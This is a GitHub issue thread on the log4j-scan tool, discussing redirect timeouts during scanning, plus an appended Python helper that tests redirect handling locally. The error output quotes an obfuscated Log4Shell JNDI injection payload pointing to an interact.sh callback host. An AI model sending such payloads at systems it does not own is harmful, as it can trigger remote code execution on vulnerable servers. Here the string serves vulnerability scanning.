fullhunt / log4j-scan

A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228

http-to-https redirects are not handled well during scanning (exception, timeout)

perskes opened this issue · comments

System:

Windows 10 - Python 3.10, Pycharms IDE and Terminal

Linux (WSL2) - Python 3.8

Problem:

http://my.awesome.site is redirected to https://my.awesome.site (set on the firewall).
This causes the following error/throwup/dump:

[•] URL: http://my.awesome.site | PAYLOAD: ${${lower:${lower:jndi}}:${lower:rmi}://my.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh/ikhn0qc}
EXCEPTION: HTTPConnectionPool(host='my.awesome.site', port=80): Max retries exceeded with url: /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fmy.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh%2Fikhn0qc%7D (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f1d0b353f10>, 'Connection to my.awesome.site timed out. (connect timeout=4)'))
EXCEPTION: HTTPConnectionPool(host='my.awesome.site', port=80): Max retries exceeded with url: /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fmy.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh%2Fikhn0qc%7D (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f1d0ae45e20>, 'Connection to my.awesome.site timed out. (connect timeout=4)'))
EXCEPTION: HTTPConnectionPool(host='my.awesome.site', port=80): Max retries exceeded with url: /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fmy.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh%2Fikhn0qc%7D (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f1d0b331ee0>, 'Connection to my.awesome.site timed out. (connect timeout=4)'))

The browser gets a 302 redirect, while the scanner does not follow the redirect and instead retries the same URL two more times.
This is very time-inefficient and causes my traces to take much longer than they should.

Besides that, the tool works amazingly well, and this is just something that bugs me.
It's fully functional even with that problem.

Hi @perskes

Thank you very much for your suggestion! I just added this option now :)

0502467

--disable-http-redirects

This should disable web redirects when used.

while the scanner does not follow the redirect

@perskes: Can you explain your use case a little bit more, please? Because I'm not sure I understand where the ConnectTimeoutError comes from.

Because from real tests and the snippet below, log4j-scan is following the http->http(s) redirects.

Snippet:

  • On your host, run an https port sniffer (sample: sudo tcpflow -i any -C -J port 443)
  • In another window, run python3 log4j-scan.py -u http://github.com --custom-dns-callback-host "noexist" (http://github.com redirects to https://github.com)

You can see some activity on the https port (=> redirection).
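The distinction the two replies above turn on (a 302 that a scanner may follow versus a TCP connect to port 80 that never completes) as an added example, not log4j-scan's own code: a hypothetical classify_url helper probes a URL once without following redirects and names which case it hit, run here against a constructed local server that mimics the firewall's http-to-https 302.

```python
import http.client
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

def classify_url(url, timeout=4.0):
    """Hypothetical helper (not log4j-scan code): one GET without following
    redirects; caller can then follow the 302, log it, or skip the host."""
    parts = urlsplit(url)
    https = parts.scheme == "https"
    conn_cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port or (443 if https else 80), timeout=timeout)
    target = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    try:
        conn.request("GET", target, headers={"Host": parts.netloc})
        resp = conn.getresponse()
        location = resp.getheader("Location")
        if 300 <= resp.status < 400 and location:
            return ("redirect", location)      # e.g. http -> https at the firewall
        return ("response", resp.status)       # a real answer worth scanning
    except socket.timeout:                     # the issue's ConnectTimeoutError case
        return ("timeout", "no answer within %.1fs" % timeout)
    except OSError as exc:                     # refused, DNS failure, reset, ...
        return ("unreachable", type(exc).__name__)
    finally:
        conn.close()

class _RedirectToHttps(BaseHTTPRequestHandler):
    """Constructed stand-in for the firewall: plain HTTP gets a 302 to https://."""
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", "https://" + self.headers["Host"] + self.path)
        self.end_headers()
    def log_message(self, *args): pass  # keep the demo quiet

def start_redirect_server():
    srv = HTTPServer(("127.0.0.1", 0), _RedirectToHttps)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def unused_local_port():
    with socket.socket() as s:  # bind then release: connecting here is refused
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

if __name__ == "__main__":
    srv = start_redirect_server()
    print(classify_url("http://127.0.0.1:%d/?v=probe" % srv.server_port))
    srv.shutdown()
```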